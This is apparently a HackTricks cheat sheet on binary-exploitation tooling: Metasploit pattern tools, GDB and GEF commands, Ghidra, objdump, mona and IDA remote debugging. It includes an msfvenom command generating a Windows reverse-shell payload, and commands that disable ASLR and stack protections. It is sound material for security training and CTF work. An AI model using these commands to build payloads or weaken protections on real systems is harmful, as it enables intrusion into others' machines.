hacktricks/exploiting/tools/README.md

Exploiting Tools

Metasploit

pattern_create.rb -l 3000   #Length
pattern_offset.rb -l 3000 -q 5f97d534   #Search offset
nasm_shell.rb
nasm> jmp esp   #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01

Shellcodes

msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c

GDB

Install

apt-get install gdb

Parameters

-q --> No show banner
-x <file> --> Auto-execute GDB instructions from here
-p <pid> --> Attach to process

Instructions

> disassemble main --> Disassemble the function
> disassemble 0x12345678
> set disassembly-flavor intel
> set follow-fork-mode child/parent --> Follow created process
> p system --> Find the address of the system function
> help
> quit

> br func --> Add breakpoint to function
> br *func+23
> br *0x12345678
> del NUM --> Delete that number of br
> watch EXPRESSION --> Break if the value changes

> run --> Execute
> start --> Start and break in main
> n/next --> Execute next instruction (no inside)
> s/step --> Execute next instruction
> c/continue --> Continue until next breakpoint

> set $eip = 0x12345678 --> Change value of $eip
> info functions --> Info abount functions
> info functions func --> Info of the funtion
> info registers --> Value of the registers
> bt --> Stack
> bt full --> Detailed stack

> print variable
> print 0x87654321 - 0x12345678 --> Caculate
> examine o/x/u/t/i/s dir_mem/reg/puntero --> Shows content in octal/hexa/10/bin/instruction/ascii

• x/o 0xDir_hex
• x/2x $eip --> 2Words from EIP
• x/2x $eip -4 --> $eip - 4
• x/8xb $eip --> 8 bytes (b-> byte, h-> 2bytes, w-> 4bytes, g-> 8bytes)
• i r eip --> Value of $eip
• x/w pointer --> Value of the pointer
• x/s pointer --> String pointed by the pointer
• x/xw &pointer --> Address where the pointer is located
• x/i $eip —> Instructions of the EIP

GEF

checksec #Check protections
p system #Find system function address
search-pattern "/bin/sh" #Search in the process memory
vmmap #Get memory mappings

#Shellcode
shellcode search x86 #Search shellcodes
shellcode get 61 #Download shellcode number 61

#Patterns
pattern create 200 #Generate length 200 pattern
pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp

#Another way to get the offset of to the RIP
1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
2- ef➤  i f
Stack level 0, frame at 0x7fffffffddd0:
 rip = 0x400cd3; saved rip = 0x6261617762616176
 called by frame at 0x7fffffffddd8
 Arglist at 0x7fffffffdcf8, args: 
 Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
 Saved registers:
  rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
gef➤  pattern search 0x6261617762616176
[+] Searching for '0x6261617762616176'
[+] Found at offset 184 (little-endian search) likely

Tricks

GDB same addresses

While debugging GDB will have **slightly different addresses than the used by the binary when executed. **You can make GDB have the same addresses by doing:

• unset env LINES
• unset env COLUMNS
• set env _=<path> Put the absolute path to the binary
• Exploit the binary using the same absolute route
• PWD and OLDPWD must be the same when using GDB and when exploiting the binary

Backtrace to find functions called

When you have a statically linked binary all the functions will belong to the binary (and no to external libraries). In this case it will be difficult to** identify the flow that the binary follows to for example ask for user input**.
You can easily identify this flow by **running **the binary with **gdb **until you are asked for input. Then, stop it with CTRL+C and use the bt (backtrace) command to see the functions called:

gef➤  bt
#0  0x00000000004498ae in ?? ()
#1  0x0000000000400b90 in ?? ()
#2  0x0000000000400c1d in ?? ()
#3  0x00000000004011a9 in ?? ()
#4  0x0000000000400a5a in ?? ()

GDB server

gdbserver --multi 0.0.0.0:23947 (in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine)

Ghidra

Find stack offset

**Ghidra **is very useful to find the the **offset **for a buffer overflow thanks to the information about the position of the local variables.
****For example, in the example below, a buffer flow in local_bc indicates that you need an offset of 0xbc. Moreover, if local_10 is a canary cookie it indicates that to overwrite it from local_bc there is an offset of 0xac.
Remember that the first 0x08 from where the RIP is saved belongs to the RBP.

GCC

gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2 --> Compile without protections
-o --> Output
-g --> Save code (GDB will be able to see it)
echo 0 > /proc/sys/kernel/randomize_va_space --> To deactivate the ASLR in linux

To compile a shellcode:
nasm -f elf assembly.asm --> return a ".o"
ld assembly.o -o shellcodeout --> Executable

Objdump

-d --> **Disassemble executable **sections (see opcodes of a compiled shellcode, find ROP Gadgets, find function address...)
-Mintel --> **Intel **syntax
-t --> **Symbols **table
-D --> **Disassemble all **(address of static variable)
-s -j .dtors --> dtors section
-s -j .got --> got section
-D -s -j .plt --> **plt **section decompiled
-TR --> Relocations
ojdump -t --dynamic-relo ./exec | grep puts --> Address of "puts" to modify in GOT
objdump -D ./exec | grep "VAR_NAME" --> Address or a static variable (those are stored in DATA section).

Core dumps

1. Run ulimit -c unlimited before starting my program
2. Run sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t
3. sudo gdb --core=<path/core> --quiet

More

ldd executable | grep libc.so.6 --> Address (if ASLR, then this change every time)
for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done --> Loop to see if the address changes a lot
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system --> Offset of "system"
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh --> Offset of "/bin/sh"

strace executable --> Functions called by the executable
**rabin2 -i ejecutable --> **Address of all the functions

Inmunity debugger

!mona modules    #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll   #Search for opcodes insie dll space (JMP ESP)

IDA

Debugging in remote linux

Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary _linux_server _or _linux_server64 _inside the linux server and run it nside the folder that contains the binary:

./linux_server64 -Ppass

Then, configure the debugger: Debugger (linux remote) --> Proccess options...: